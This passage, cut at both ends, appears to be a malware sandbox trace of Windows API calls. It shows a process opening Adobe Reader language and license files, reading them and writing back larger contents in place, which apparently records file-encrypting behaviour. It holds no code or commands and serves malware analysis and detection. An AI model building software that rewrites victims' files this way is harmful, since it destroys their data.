lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x359f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0076.853] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0076.853] WriteFile (in: hFile=0x1d4, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x359f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0076.854] CloseHandle (hObject=0x1d4) returned 1 [0076.854] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0076.855] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.855] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2000 [0076.855] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.855] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.856] ReleaseMutex (hMutex=0x168) returned 1 [0076.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.POL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.POL", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.POL", lpUsedDefaultChar=0x0) returned 11 [0076.856] ReadFile (in: hFile=0x1d4, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x359f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0076.858] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0076.858] WriteFile (in: hFile=0x1d4, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x359f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0076.859] CloseHandle (hObject=0x1d4) returned 1 [0076.859] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0076.860] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.860] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1e00 [0076.860] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.860] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.861] ReleaseMutex (hMutex=0x168) returned 1 [0076.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.TUR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.TUR", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.TUR", lpUsedDefaultChar=0x0) returned 11 [0076.861] ReadFile (in: hFile=0x1d4, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x359f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0076.863] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0076.863] WriteFile (in: hFile=0x1d4, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x359f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0076.864] CloseHandle (hObject=0x1d4) returned 1 [0076.864] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\chs\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0076.865] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.865] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x12dac [0076.865] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.865] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.865] ReleaseMutex (hMutex=0x168) returned 1 [0076.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0076.866] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.868] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x11dac [0076.868] ReadFile (in: hFile=0x1d4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.869] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x11dac [0076.870] WriteFile (in: hFile=0x1d4, lpBuffer=0x2669898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.871] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0076.871] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.871] CloseHandle (hObject=0x1d4) returned 1 [0076.872] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\deu\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0076.872] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.872] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xc750 [0076.873] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.873] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.873] ReleaseMutex (hMutex=0x168) returned 1 [0076.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0076.873] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.878] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xb750 [0076.878] ReadFile (in: hFile=0x1d4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.879] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xb750 [0076.879] WriteFile (in: hFile=0x1d4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.879] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0076.879] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.880] CloseHandle (hObject=0x1d4) returned 1 [0076.880] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\fra\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0076.881] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.881] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xe94c [0076.881] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.881] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.882] ReleaseMutex (hMutex=0x168) returned 1 [0076.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0076.882] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0077.275] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xd94c [0077.275] ReadFile (in: hFile=0x1d4, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.276] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xd94c [0077.276] WriteFile (in: hFile=0x1d4, lpBuffer=0x2696c48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c48*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.277] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0077.277] WriteFile (in: hFile=0x1d4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0077.277] CloseHandle (hObject=0x1d4) returned 1 [0077.281] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0077.282] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0077.282] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1dc34 [0077.282] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0077.282] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.282] ReleaseMutex (hMutex=0x168) returned 1 [0077.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0077.283] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0077.285] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1cc34 [0077.285] ReadFile (in: hFile=0x1d4, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.286] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1cc34 [0077.286] WriteFile (in: hFile=0x1d4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.289] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0077.289] WriteFile (in: hFile=0x1d4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0077.290] CloseHandle (hObject=0x1d4) returned 1 [0077.290] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\pol\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0077.291] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0077.291] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xf0a0 [0077.291] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0077.291] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.292] ReleaseMutex (hMutex=0x168) returned 1 [0077.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0077.292] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0077.294] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xe0a0 [0077.294] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.295] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xe0a0 [0077.295] WriteFile (in: hFile=0x1d4, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.296] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0077.296] WriteFile (in: hFile=0x1d4, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0077.296] CloseHandle (hObject=0x1d4) returned 1 [0077.297] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sky\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0077.297] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0077.298] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x10d39 [0077.298] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0077.298] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.298] ReleaseMutex (hMutex=0x168) returned 1 [0077.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0077.298] ReadFile (in: hFile=0x1d4, lpBuffer=0x2693be8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0077.300] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xfd39 [0077.300] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.301] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xfd39 [0077.301] WriteFile (in: hFile=0x1d4, lpBuffer=0x2669898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.302] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0077.302] WriteFile (in: hFile=0x1d4, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0077.302] CloseHandle (hObject=0x1d4) returned 1 [0077.303] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0077.303] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0077.303] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xfa69 [0077.303] SetFilePointer (in: 